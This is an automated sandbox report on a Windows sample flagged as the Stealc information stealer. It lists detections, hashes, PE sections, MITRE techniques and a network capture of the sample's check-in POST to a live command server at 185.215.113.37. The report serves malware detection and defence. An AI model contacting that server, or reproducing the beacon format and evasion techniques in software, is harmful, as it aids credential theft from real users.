                Source: Yara match | File source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 651 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 53% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.phpH | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpT | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpT | file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpH | file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532863
                Start date and time:2024-10-14 03:06:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 83
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.945564787167383
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'778'176 bytes
                MD5:02fe6d790607494b5b820f41cdad2e17
                SHA1:1e526eb65c6c1677ced067310193991805faeea1
                SHA256:37008bff1b7f3719aee4bae2d90ba57c05618731bece25285e44160137e9c1d3
                SHA512:afece157f8dc32d871b23105990f4504be6b021580c68136a92de7421b8085d987e6f355d7bd760416ab40c64623156c0f7acba1e07e33ea94f6b860e436b904
                SSDEEP:24576:kRLj6R+0WGiGrja3PxORy383AHi9SbjCUozzhWRDFo/pnml2AglxMZ0d1Hm1CNB7:NRPWKja3JitQC9bNWRDFU22AKGwY
                TLSH:3485330A74573417CE6952336A0FC3BA022A4A3385A7176B73D78E8395FE949F530E6C
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:90cececece8e8eb0
                Entrypoint:0xa6f000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (empty name) | 0x1000 | 0x25b000 | 0x22800 | 7a9e9ce790982fc43d631e2441a72627 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (empty name) | 0x25e000 | 0x284000 | 0x200 | 69c8000d402f77aa35a6fadb31bb90f6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                njbeecvb | 0x4e2000 | 0x18c000 | 0x18c000 | 2873425bdc89f53307a06716a7711def | False | 0.9945937647964015 | data | 7.953282127630772 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                zajrgpdb | 0x66e000 | 0x1000 | 0x400 | 4cfcf98a8544f4d1fda034882eced509 | False | 0.7275390625 | data | 5.75819823192357 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x66f000 | 0x3000 | 0x2200 | f4b2758e9c4a8cc5921f31574f189368 | False | 0.08846507352941177 | Applesoft BASIC program data, first line number 15 | 1.0166808854095564 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-14T03:07:06.871801+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 14, 2024 03:07:05.812427998 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:05.817724943 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 14, 2024 03:07:05.817847967 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:05.818192005 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:05.823048115 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 14, 2024 03:07:06.615434885 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 14, 2024 03:07:06.615540028 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:06.629586935 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:06.634742975 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 14, 2024 03:07:06.871690989 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                Oct 14, 2024 03:07:06.871800900 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                Oct 14, 2024 03:07:10.805037975 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                • 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6312 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 14, 2024 03:07:05.818192005 CEST | 89 | OUT | GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 03:07:06.615434885 CEST | 203 | IN | HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:07:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 03:07:06.629586935 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a
                Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="hwid"B88C617822D72284582127------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build"doma------HIDBFCBGDBKKECBFCGIE--
                Oct 14, 2024 03:07:06.871690989 CEST | 210 | IN | HTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:07:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Target ID:0
                Start time:21:07:01
                Start date:13/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x9a0000
                File size:1'778'176 bytes
                MD5 hash:02FE6D790607494B5B820F41CDAD2E17
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true


                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:3.2%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:25
14182->14183 14184 9a45c0 2 API calls 14183->14184 14185 9a38de 14184->14185 14186 9a45c0 2 API calls 14185->14186 14187 9a38f7 14186->14187 14188 9a45c0 2 API calls 14187->14188 14189 9a3910 14188->14189 14190 9a45c0 2 API calls 14189->14190 14191 9a3929 14190->14191 14192 9a45c0 2 API calls 14191->14192 14193 9a3942 14192->14193 14194 9a45c0 2 API calls 14193->14194 14195 9a395b 14194->14195 14196 9a45c0 2 API calls 14195->14196 14197 9a3974 14196->14197 14198 9a45c0 2 API calls 14197->14198 14199 9a398d 14198->14199 14200 9a45c0 2 API calls 14199->14200 14201 9a39a6 14200->14201 14202 9a45c0 2 API calls 14201->14202 14203 9a39bf 14202->14203 14204 9a45c0 2 API calls 14203->14204 14205 9a39d8 14204->14205 14206 9a45c0 2 API calls 14205->14206 14207 9a39f1 14206->14207 14208 9a45c0 2 API calls 14207->14208 14209 9a3a0a 14208->14209 14210 9a45c0 2 API calls 14209->14210 14211 9a3a23 14210->14211 14212 9a45c0 2 API calls 14211->14212 14213 9a3a3c 14212->14213 14214 9a45c0 2 API calls 14213->14214 14215 9a3a55 14214->14215 14216 9a45c0 2 API calls 14215->14216 14217 9a3a6e 14216->14217 14218 9a45c0 2 API calls 14217->14218 14219 9a3a87 14218->14219 14220 9a45c0 2 API calls 14219->14220 14221 9a3aa0 14220->14221 14222 9a45c0 2 API calls 14221->14222 14223 9a3ab9 14222->14223 14224 9a45c0 2 API calls 14223->14224 14225 9a3ad2 14224->14225 14226 9a45c0 2 API calls 14225->14226 14227 9a3aeb 14226->14227 14228 9a45c0 2 API calls 14227->14228 14229 9a3b04 14228->14229 14230 9a45c0 2 API calls 14229->14230 14231 9a3b1d 14230->14231 14232 9a45c0 2 API calls 14231->14232 14233 9a3b36 14232->14233 14234 9a45c0 2 API calls 14233->14234 14235 9a3b4f 14234->14235 14236 9a45c0 2 API calls 14235->14236 14237 9a3b68 14236->14237 14238 9a45c0 2 API calls 14237->14238 14239 9a3b81 14238->14239 14240 9a45c0 2 API calls 14239->14240 14241 9a3b9a 14240->14241 14242 9a45c0 2 API calls 14241->14242 14243 9a3bb3 14242->14243 14244 9a45c0 2 API calls 14243->14244 14245 9a3bcc 14244->14245 
14246 9a45c0 2 API calls 14245->14246 14247 9a3be5 14246->14247 14248 9a45c0 2 API calls 14247->14248 14249 9a3bfe 14248->14249 14250 9a45c0 2 API calls 14249->14250 14251 9a3c17 14250->14251 14252 9a45c0 2 API calls 14251->14252 14253 9a3c30 14252->14253 14254 9a45c0 2 API calls 14253->14254 14255 9a3c49 14254->14255 14256 9a45c0 2 API calls 14255->14256 14257 9a3c62 14256->14257 14258 9a45c0 2 API calls 14257->14258 14259 9a3c7b 14258->14259 14260 9a45c0 2 API calls 14259->14260 14261 9a3c94 14260->14261 14262 9a45c0 2 API calls 14261->14262 14263 9a3cad 14262->14263 14264 9a45c0 2 API calls 14263->14264 14265 9a3cc6 14264->14265 14266 9a45c0 2 API calls 14265->14266 14267 9a3cdf 14266->14267 14268 9a45c0 2 API calls 14267->14268 14269 9a3cf8 14268->14269 14270 9a45c0 2 API calls 14269->14270 14271 9a3d11 14270->14271 14272 9a45c0 2 API calls 14271->14272 14273 9a3d2a 14272->14273 14274 9a45c0 2 API calls 14273->14274 14275 9a3d43 14274->14275 14276 9a45c0 2 API calls 14275->14276 14277 9a3d5c 14276->14277 14278 9a45c0 2 API calls 14277->14278 14279 9a3d75 14278->14279 14280 9a45c0 2 API calls 14279->14280 14281 9a3d8e 14280->14281 14282 9a45c0 2 API calls 14281->14282 14283 9a3da7 14282->14283 14284 9a45c0 2 API calls 14283->14284 14285 9a3dc0 14284->14285 14286 9a45c0 2 API calls 14285->14286 14287 9a3dd9 14286->14287 14288 9a45c0 2 API calls 14287->14288 14289 9a3df2 14288->14289 14290 9a45c0 2 API calls 14289->14290 14291 9a3e0b 14290->14291 14292 9a45c0 2 API calls 14291->14292 14293 9a3e24 14292->14293 14294 9a45c0 2 API calls 14293->14294 14295 9a3e3d 14294->14295 14296 9a45c0 2 API calls 14295->14296 14297 9a3e56 14296->14297 14298 9a45c0 2 API calls 14297->14298 14299 9a3e6f 14298->14299 14300 9a45c0 2 API calls 14299->14300 14301 9a3e88 14300->14301 14302 9a45c0 2 API calls 14301->14302 14303 9a3ea1 14302->14303 14304 9a45c0 2 API calls 14303->14304 14305 9a3eba 14304->14305 14306 9a45c0 2 API calls 14305->14306 14307 9a3ed3 14306->14307 14308 9a45c0 2 
API calls 14307->14308 14309 9a3eec 14308->14309 14310 9a45c0 2 API calls 14309->14310 14311 9a3f05 14310->14311 14312 9a45c0 2 API calls 14311->14312 14313 9a3f1e 14312->14313 14314 9a45c0 2 API calls 14313->14314 14315 9a3f37 14314->14315 14316 9a45c0 2 API calls 14315->14316 14317 9a3f50 14316->14317 14318 9a45c0 2 API calls 14317->14318 14319 9a3f69 14318->14319 14320 9a45c0 2 API calls 14319->14320 14321 9a3f82 14320->14321 14322 9a45c0 2 API calls 14321->14322 14323 9a3f9b 14322->14323 14324 9a45c0 2 API calls 14323->14324 14325 9a3fb4 14324->14325 14326 9a45c0 2 API calls 14325->14326 14327 9a3fcd 14326->14327 14328 9a45c0 2 API calls 14327->14328 14329 9a3fe6 14328->14329 14330 9a45c0 2 API calls 14329->14330 14331 9a3fff 14330->14331 14332 9a45c0 2 API calls 14331->14332 14333 9a4018 14332->14333 14334 9a45c0 2 API calls 14333->14334 14335 9a4031 14334->14335 14336 9a45c0 2 API calls 14335->14336 14337 9a404a 14336->14337 14338 9a45c0 2 API calls 14337->14338 14339 9a4063 14338->14339 14340 9a45c0 2 API calls 14339->14340 14341 9a407c 14340->14341 14342 9a45c0 2 API calls 14341->14342 14343 9a4095 14342->14343 14344 9a45c0 2 API calls 14343->14344 14345 9a40ae 14344->14345 14346 9a45c0 2 API calls 14345->14346 14347 9a40c7 14346->14347 14348 9a45c0 2 API calls 14347->14348 14349 9a40e0 14348->14349 14350 9a45c0 2 API calls 14349->14350 14351 9a40f9 14350->14351 14352 9a45c0 2 API calls 14351->14352 14353 9a4112 14352->14353 14354 9a45c0 2 API calls 14353->14354 14355 9a412b 14354->14355 14356 9a45c0 2 API calls 14355->14356 14357 9a4144 14356->14357 14358 9a45c0 2 API calls 14357->14358 14359 9a415d 14358->14359 14360 9a45c0 2 API calls 14359->14360 14361 9a4176 14360->14361 14362 9a45c0 2 API calls 14361->14362 14363 9a418f 14362->14363 14364 9a45c0 2 API calls 14363->14364 14365 9a41a8 14364->14365 14366 9a45c0 2 API calls 14365->14366 14367 9a41c1 14366->14367 14368 9a45c0 2 API calls 14367->14368 14369 9a41da 14368->14369 14370 9a45c0 2 API calls 
14369->14370 14371 9a41f3 14370->14371 14372 9a45c0 2 API calls 14371->14372 14373 9a420c 14372->14373 14374 9a45c0 2 API calls 14373->14374 14375 9a4225 14374->14375 14376 9a45c0 2 API calls 14375->14376 14377 9a423e 14376->14377 14378 9a45c0 2 API calls 14377->14378 14379 9a4257 14378->14379 14380 9a45c0 2 API calls 14379->14380 14381 9a4270 14380->14381 14382 9a45c0 2 API calls 14381->14382 14383 9a4289 14382->14383 14384 9a45c0 2 API calls 14383->14384 14385 9a42a2 14384->14385 14386 9a45c0 2 API calls 14385->14386 14387 9a42bb 14386->14387 14388 9a45c0 2 API calls 14387->14388 14389 9a42d4 14388->14389 14390 9a45c0 2 API calls 14389->14390 14391 9a42ed 14390->14391 14392 9a45c0 2 API calls 14391->14392 14393 9a4306 14392->14393 14394 9a45c0 2 API calls 14393->14394 14395 9a431f 14394->14395 14396 9a45c0 2 API calls 14395->14396 14397 9a4338 14396->14397 14398 9a45c0 2 API calls 14397->14398 14399 9a4351 14398->14399 14400 9a45c0 2 API calls 14399->14400 14401 9a436a 14400->14401 14402 9a45c0 2 API calls 14401->14402 14403 9a4383 14402->14403 14404 9a45c0 2 API calls 14403->14404 14405 9a439c 14404->14405 14406 9a45c0 2 API calls 14405->14406 14407 9a43b5 14406->14407 14408 9a45c0 2 API calls 14407->14408 14409 9a43ce 14408->14409 14410 9a45c0 2 API calls 14409->14410 14411 9a43e7 14410->14411 14412 9a45c0 2 API calls 14411->14412 14413 9a4400 14412->14413 14414 9a45c0 2 API calls 14413->14414 14415 9a4419 14414->14415 14416 9a45c0 2 API calls 14415->14416 14417 9a4432 14416->14417 14418 9a45c0 2 API calls 14417->14418 14419 9a444b 14418->14419 14420 9a45c0 2 API calls 14419->14420 14421 9a4464 14420->14421 14422 9a45c0 2 API calls 14421->14422 14423 9a447d 14422->14423 14424 9a45c0 2 API calls 14423->14424 14425 9a4496 14424->14425 14426 9a45c0 2 API calls 14425->14426 14427 9a44af 14426->14427 14428 9a45c0 2 API calls 14427->14428 14429 9a44c8 14428->14429 14430 9a45c0 2 API calls 14429->14430 14431 9a44e1 14430->14431 14432 9a45c0 2 API calls 14431->14432 
14433 9a44fa 14432->14433 14434 9a45c0 2 API calls 14433->14434 14435 9a4513 14434->14435 14436 9a45c0 2 API calls 14435->14436 14437 9a452c 14436->14437 14438 9a45c0 2 API calls 14437->14438 14439 9a4545 14438->14439 14440 9a45c0 2 API calls 14439->14440 14441 9a455e 14440->14441 14442 9a45c0 2 API calls 14441->14442 14443 9a4577 14442->14443 14444 9a45c0 2 API calls 14443->14444 14445 9a4590 14444->14445 14446 9a45c0 2 API calls 14445->14446 14447 9a45a9 14446->14447 14448 9b9c10 14447->14448 14449 9b9c20 43 API calls 14448->14449 14450 9ba036 8 API calls 14448->14450 14449->14450 14451 9ba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14450->14451 14452 9ba146 14450->14452 14451->14452 14453 9ba153 8 API calls 14452->14453 14454 9ba216 14452->14454 14453->14454 14455 9ba298 14454->14455 14456 9ba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14454->14456 14457 9ba337 14455->14457 14458 9ba2a5 6 API calls 14455->14458 14456->14455 14459 9ba41f 14457->14459 14460 9ba344 9 API calls 14457->14460 14458->14457 14461 9ba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14459->14461 14462 9ba4a2 14459->14462 14460->14459 14461->14462 14463 9ba4ab GetProcAddress GetProcAddress 14462->14463 14464 9ba4dc 14462->14464 14463->14464 14465 9ba515 14464->14465 14466 9ba4e5 GetProcAddress GetProcAddress 14464->14466 14467 9ba612 14465->14467 14468 9ba522 10 API calls 14465->14468 14466->14465 14469 9ba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14467->14469 14470 9ba67d 14467->14470 14468->14467 14469->14470 14471 9ba69e 14470->14471 14472 9ba686 GetProcAddress 14470->14472 14473 9b5ca3 14471->14473 14474 9ba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14471->14474 14472->14471 14475 9a1590 14473->14475 14474->14473 15595 9a1670 14475->15595 14478 9ba7a0 lstrcpy 14479 9a15b5 14478->14479 14480 9ba7a0 lstrcpy 14479->14480 14481 9a15c7 14480->14481 
